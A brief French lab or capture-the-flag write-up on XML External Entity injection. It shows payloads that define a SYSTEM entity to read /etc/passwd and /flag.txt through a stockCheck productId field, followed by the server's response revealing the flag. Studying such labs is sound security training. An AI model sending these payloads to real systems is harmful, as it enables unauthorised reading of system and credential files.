XML External Entities (XXE)
Consignes
Réalisation
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>Last updated
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>Last updated
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck><stockCheck>
<productId>2600{NHuohnNCk86DYUER0dB2eg}</productId>
</stockCheck>2600{NHuohnNCk86DYUER0dB2eg}